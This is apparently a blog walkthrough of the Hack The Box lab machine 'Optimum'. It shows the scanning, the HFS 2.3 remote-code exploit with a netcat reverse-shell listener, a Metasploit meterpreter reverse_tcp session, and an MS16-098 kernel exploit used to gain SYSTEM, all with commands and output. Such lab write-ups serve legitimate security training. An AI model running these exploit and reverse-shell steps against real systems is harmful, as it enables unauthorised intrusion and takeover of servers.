Posted on by

HTB: Optimum

Details

This machine is Optimum from Hack The Box

Recon Phase

kali:~# nmap -sV -p- -T4 10.10.10.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-05 02:37 EDT
Nmap scan report for 10.10.10.8
Host is up (0.033s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.40 seconds

User Hunting

So only port 80, I took a look

Screenshot 1

Exploit db revealed a potential payload of https://www.exploit-db.com/exploits/39161, so I saved it locally and opened a listener

root@kali:~# nc -nlvp 4444

And setup for the exploit

root@kali:~# cp /usr/share/windows-binaries/nc.exe /var/www/html/
root@kali:~# apache2ctl start

I ran the exploit, it didn't work the first time, but the second time it worked

root@kali:~# python exploit.py 10.10.10.8 80
connect to [10.10.14.35] from (UNKNOWN) [10.10.10.8] 49170
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>

Now to get the user flag

C:\Users\kostas\Desktop>dir /a
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196
 Directory of C:\Users\kostas\Desktop
11/07/2019  06:19 ��    <DIR>          .
11/07/2019  06:19 ��    <DIR>          ..
18/03/2017  02:57 ��               282 desktop.ini
18/03/2017  03:11 ��           760.320 hfs.exe
18/03/2017  03:13 ��                32 user.txt.txt
               3 File(s)        760.634 bytes
               2 Dir(s)  31.886.536.704 bytes free
C:\Users\kostas\Desktop>type user.txt.txt
[REDACTED]

System Hunting

I began to enumerate

C:\Users\kostas\Desktop>systeminfo
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
[SNIP]

This led to https://www.exploit-db.com/raw/39719 but I had some issues uploading it, so I ended up using metasploit to get a meterpreter shell instead

root@kali:~# msfconsole
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Using URL: http://0.0.0.0:8080/1H1DUCW
[*] Local IP: http://10.0.3.15:8080/1H1DUCW
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /1H1DUCW
[*] Sending stage (206403 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.8:49167) at 2019-07-05 15:19:19 -0400
[!] Tried to delete %TEMP%\aeuCx.vbs, unknown result
[*] Server stopped.
meterpreter >

And used windows exploit suggester to get a exploit

root@kali:~# ./windows-exploit-suggester.py --database 2019-07-05-mssb.xls --systeminfo sysinfo.txt

This led me to https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS16-098/bfill.exe

meterpreter > upload bfill.exe C:\\tmp\\bfill.exe
[*] uploading  : bfill.exe -> C:\tmp\bfill.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): bfill.exe -> C:\tmp\bfill.exe
[*] uploaded   : bfill.exe -> C:\tmp\bfill.exe
meterpreter > shell
Process 1788 created.
Channel 11 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\tmp>
C:\tmp>bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\tmp>
C:\tmp>whoami
nt authority\system

Awesome

C:\tmp>cd ../Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196
 Directory of C:\Users\Administrator\Desktop
18/03/2017  03:14 ��    <DIR>          .
18/03/2017  03:14 ��    <DIR>          ..
18/03/2017  03:14 ��                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  31.897.886.720 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.